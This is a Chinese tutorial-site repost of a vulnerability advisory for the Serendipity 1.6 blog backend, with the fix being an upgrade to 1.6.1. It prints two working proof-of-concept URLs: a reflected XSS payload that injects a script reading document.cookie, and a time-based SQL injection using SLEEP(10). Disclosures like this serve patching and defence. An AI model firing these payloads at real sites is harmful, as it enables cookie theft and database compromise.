网站地图    收藏   

主页 > 后端 > 网站安全 >

Serendipity 1.6后端XSS及SQLi缺陷 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 14:11 作者: 阅读:

[导读] 标题Serendipity 1.6 Backend Cross-Site Scripting and SQL-Injection vulnerability作者Stefan Schurtz影响版本: Successfully tested on Serendipity 1.6开发者官网:http://www.s9y.org状态:已......

标题Serendipity 1.6 Backend Cross-Site Scripting and SQL-Injection vulnerability
作者Stefan Schurtz
影响版本:  Successfully tested on Serendipity 1.6
开发者官网:http://www.s9y.org
状态:已修复
 
缺陷描述:
==========================
 
该版本受xss及注射影响
 
==================
技术分析:
==================
 
# 跨站脚本
http://www.2cto.com /serendipity/serendipity_admin_image_selector.php?serendipity[textarea]='"</script><script>alert(document.cookie)</script>
 
# SQL注射
http://www.2cto.com /serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[plugin_to_conf]=-1' OR SLEEP(10)=0 LIMIT 1--+
 
=========
解决方案:
=========
 
升级到新版本version 1.6.1
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论